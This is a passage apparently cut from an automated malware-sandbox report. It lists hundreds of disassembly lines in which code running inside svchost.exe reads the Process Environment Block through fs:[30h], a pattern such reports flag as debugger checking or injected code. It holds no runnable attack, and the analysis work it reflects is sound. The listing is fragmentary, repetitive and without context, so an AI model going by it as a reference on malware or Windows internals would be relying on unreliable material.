          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B035C mov ecx, dword ptr fs:[00000030h]3_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]3_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B035C mov eax, dword ptr fs:[00000030h]3_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FA352 mov eax, dword ptr fs:[00000030h]3_2_034FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D8350 mov ecx, dword ptr fs:[00000030h]3_2_034D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0350634F mov eax, dword ptr fs:[00000030h]3_2_0350634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D437C mov eax, dword ptr fs:[00000030h]3_2_034D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A30B mov eax, dword ptr fs:[00000030h]3_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A30B mov eax, dword ptr fs:[00000030h]3_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A30B mov eax, dword ptr fs:[00000030h]3_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342C310 mov ecx, dword ptr fs:[00000030h]3_2_0342C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03450310 mov ecx, dword ptr fs:[00000030h]3_2_03450310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03508324 mov eax, dword ptr fs:[00000030h]3_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03508324 mov ecx, dword ptr fs:[00000030h]3_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03508324 mov eax, dword ptr fs:[00000030h]3_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03508324 mov eax, dword ptr fs:[00000030h]3_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EC3CD mov eax, dword ptr fs:[00000030h]3_2_034EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]3_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]3_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]3_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]3_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]3_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]3_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034383C0 mov eax, dword ptr fs:[00000030h]3_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034383C0 mov eax, dword ptr fs:[00000030h]3_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034383C0 mov eax, dword ptr fs:[00000030h]3_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034383C0 mov eax, dword ptr fs:[00000030h]3_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B63C0 mov eax, dword ptr fs:[00000030h]3_2_034B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE3DB mov eax, dword ptr fs:[00000030h]3_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE3DB mov eax, dword ptr fs:[00000030h]3_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE3DB mov ecx, dword ptr fs:[00000030h]3_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE3DB mov eax, dword ptr fs:[00000030h]3_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D43D4 mov eax, dword ptr fs:[00000030h]3_2_034D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D43D4 mov eax, dword ptr fs:[00000030h]3_2_034D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]3_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E3F0 mov eax, dword ptr fs:[00000030h]3_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E3F0 mov eax, dword ptr fs:[00000030h]3_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E3F0 mov eax, dword ptr fs:[00000030h]3_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034663FF mov eax, dword ptr fs:[00000030h]3_2_034663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342E388 mov eax, dword ptr fs:[00000030h]3_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342E388 mov eax, dword ptr fs:[00000030h]3_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342E388 mov eax, dword ptr fs:[00000030h]3_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345438F mov eax, dword ptr fs:[00000030h]3_2_0345438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345438F mov eax, dword ptr fs:[00000030h]3_2_0345438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03428397 mov eax, dword ptr fs:[00000030h]3_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03428397 mov eax, dword ptr fs:[00000030h]3_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03428397 mov eax, dword ptr fs:[00000030h]3_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B8243 mov eax, dword ptr fs:[00000030h]3_2_034B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B8243 mov ecx, dword ptr fs:[00000030h]3_2_034B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0350625D mov eax, dword ptr fs:[00000030h]3_2_0350625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342A250 mov eax, dword ptr fs:[00000030h]3_2_0342A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436259 mov eax, dword ptr fs:[00000030h]3_2_03436259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EA250 mov eax, dword ptr fs:[00000030h]3_2_034EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EA250 mov eax, dword ptr fs:[00000030h]3_2_034EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434260 mov eax, dword ptr fs:[00000030h]3_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434260 mov eax, dword ptr fs:[00000030h]3_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03434260 mov eax, dword ptr fs:[00000030h]3_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342826B mov eax, dword ptr fs:[00000030h]3_2_0342826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]3_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342823B mov eax, dword ptr fs:[00000030h]3_2_0342823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]3_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]3_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]3_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]3_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]3_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_035062D6 mov eax, dword ptr fs:[00000030h]3_2_035062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034402E1 mov eax, dword ptr fs:[00000030h]3_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034402E1 mov eax, dword ptr fs:[00000030h]3_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034402E1 mov eax, dword ptr fs:[00000030h]3_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E284 mov eax, dword ptr fs:[00000030h]3_2_0346E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346E284 mov eax, dword ptr fs:[00000030h]3_2_0346E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B0283 mov eax, dword ptr fs:[00000030h]3_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B0283 mov eax, dword ptr fs:[00000030h]3_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B0283 mov eax, dword ptr fs:[00000030h]3_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034402A0 mov eax, dword ptr fs:[00000030h]3_2_034402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034402A0 mov eax, dword ptr fs:[00000030h]3_2_034402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]3_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C62A0 mov ecx, dword ptr fs:[00000030h]3_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]3_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]3_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]3_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]3_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C4144 mov eax, dword ptr fs:[00000030h]3_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C4144 mov eax, dword ptr fs:[00000030h]3_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C4144 mov ecx, dword ptr fs:[00000030h]3_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C4144 mov eax, dword ptr fs:[00000030h]3_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C4144 mov eax, dword ptr fs:[00000030h]3_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342C156 mov eax, dword ptr fs:[00000030h]3_2_0342C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C8158 mov eax, dword ptr fs:[00000030h]3_2_034C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436154 mov eax, dword ptr fs:[00000030h]3_2_03436154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03436154 mov eax, dword ptr fs:[00000030h]3_2_03436154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504164 mov eax, dword ptr fs:[00000030h]3_2_03504164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03504164 mov eax, dword ptr fs:[00000030h]3_2_03504164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov ecx, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov ecx, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov ecx, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DE10E mov ecx, dword ptr fs:[00000030h]3_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DA118 mov ecx, dword ptr fs:[00000030h]3_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DA118 mov eax, dword ptr fs:[00000030h]3_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DA118 mov eax, dword ptr fs:[00000030h]3_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DA118 mov eax, dword ptr fs:[00000030h]3_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F0115 mov eax, dword ptr fs:[00000030h]3_2_034F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03460124 mov eax, dword ptr fs:[00000030h]3_2_03460124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F61C3 mov eax, dword ptr fs:[00000030h]3_2_034F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F61C3 mov eax, dword ptr fs:[00000030h]3_2_034F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE1D0 mov eax, dword ptr fs:[00000030h]3_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE1D0 mov eax, dword ptr fs:[00000030h]3_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]3_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE1D0 mov eax, dword ptr fs:[00000030h]3_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE1D0 mov eax, dword ptr fs:[00000030h]3_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_035061E5 mov eax, dword ptr fs:[00000030h]3_2_035061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034601F8 mov eax, dword ptr fs:[00000030h]3_2_034601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03470185 mov eax, dword ptr fs:[00000030h]3_2_03470185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EC188 mov eax, dword ptr fs:[00000030h]3_2_034EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EC188 mov eax, dword ptr fs:[00000030h]3_2_034EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D4180 mov eax, dword ptr fs:[00000030h]3_2_034D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D4180 mov eax, dword ptr fs:[00000030h]3_2_034D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B019F mov eax, dword ptr fs:[00000030h]3_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B019F mov eax, dword ptr fs:[00000030h]3_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B019F mov eax, dword ptr fs:[00000030h]3_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B019F mov eax, dword ptr fs:[00000030h]3_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342A197 mov eax, dword ptr fs:[00000030h]3_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342A197 mov eax, dword ptr fs:[00000030h]3_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342A197 mov eax, dword ptr fs:[00000030h]3_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03432050 mov eax, dword ptr fs:[00000030h]3_2_03432050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B6050 mov eax, dword ptr fs:[00000030h]3_2_034B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345C073 mov eax, dword ptr fs:[00000030h]3_2_0345C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B4000 mov ecx, dword ptr fs:[00000030h]3_2_034B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]3_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E016 mov eax, dword ptr fs:[00000030h]3_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E016 mov eax, dword ptr fs:[00000030h]3_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E016 mov eax, dword ptr fs:[00000030h]3_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344E016 mov eax, dword ptr fs:[00000030h]3_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342A020 mov eax, dword ptr fs:[00000030h]3_2_0342A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342C020 mov eax, dword ptr fs:[00000030h]3_2_0342C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C6030 mov eax, dword ptr fs:[00000030h]3_2_034C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B20DE mov eax, dword ptr fs:[00000030h]3_2_034B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0342A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034380E9 mov eax, dword ptr fs:[00000030h]3_2_034380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B60E0 mov eax, dword ptr fs:[00000030h]3_2_034B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342C0F0 mov eax, dword ptr fs:[00000030h]3_2_0342C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034720F0 mov ecx, dword ptr fs:[00000030h]3_2_034720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343208A mov eax, dword ptr fs:[00000030h]3_2_0343208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034280A0 mov eax, dword ptr fs:[00000030h]3_2_034280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034C80A8 mov eax, dword ptr fs:[00000030h]3_2_034C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F60B8 mov eax, dword ptr fs:[00000030h]3_2_034F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F60B8 mov ecx, dword ptr fs:[00000030h]3_2_034F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346674D mov esi, dword ptr fs:[00000030h]3_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346674D mov eax, dword ptr fs:[00000030h]3_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346674D mov eax, dword ptr fs:[00000030h]3_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430750 mov eax, dword ptr fs:[00000030h]3_2_03430750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BE75D mov eax, dword ptr fs:[00000030h]3_2_034BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472750 mov eax, dword ptr fs:[00000030h]3_2_03472750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472750 mov eax, dword ptr fs:[00000030h]3_2_03472750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B4755 mov eax, dword ptr fs:[00000030h]3_2_034B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03438770 mov eax, dword ptr fs:[00000030h]3_2_03438770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]3_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346C700 mov eax, dword ptr fs:[00000030h]3_2_0346C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430710 mov eax, dword ptr fs:[00000030h]3_2_03430710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03460710 mov eax, dword ptr fs:[00000030h]3_2_03460710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346C720 mov eax, dword ptr fs:[00000030h]3_2_0346C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346C720 mov eax, dword ptr fs:[00000030h]3_2_0346C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346273C mov eax, dword ptr fs:[00000030h]3_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346273C mov ecx, dword ptr fs:[00000030h]3_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346273C mov eax, dword ptr fs:[00000030h]3_2_0346273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AC730 mov eax, dword ptr fs:[00000030h]3_2_034AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343C7C0 mov eax, dword ptr fs:[00000030h]3_2_0343C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B07C3 mov eax, dword ptr fs:[00000030h]3_2_034B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034527ED mov eax, dword ptr fs:[00000030h]3_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034527ED mov eax, dword ptr fs:[00000030h]3_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034527ED mov eax, dword ptr fs:[00000030h]3_2_034527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BE7E1 mov eax, dword ptr fs:[00000030h]3_2_034BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034347FB mov eax, dword ptr fs:[00000030h]3_2_034347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034347FB mov eax, dword ptr fs:[00000030h]3_2_034347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D678E mov eax, dword ptr fs:[00000030h]3_2_034D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034307AF mov eax, dword ptr fs:[00000030h]3_2_034307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E47A0 mov eax, dword ptr fs:[00000030h]3_2_034E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344C640 mov eax, dword ptr fs:[00000030h]3_2_0344C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F866E mov eax, dword ptr fs:[00000030h]3_2_034F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F866E mov eax, dword ptr fs:[00000030h]3_2_034F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A660 mov eax, dword ptr fs:[00000030h]3_2_0346A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0346A660 mov eax, dword ptr fs:[00000030h]3_2_0346A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03462674 mov eax, dword ptr fs:[00000030h]3_2_03462674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AE609 mov eax, dword ptr fs:[00000030h]3_2_034AE609
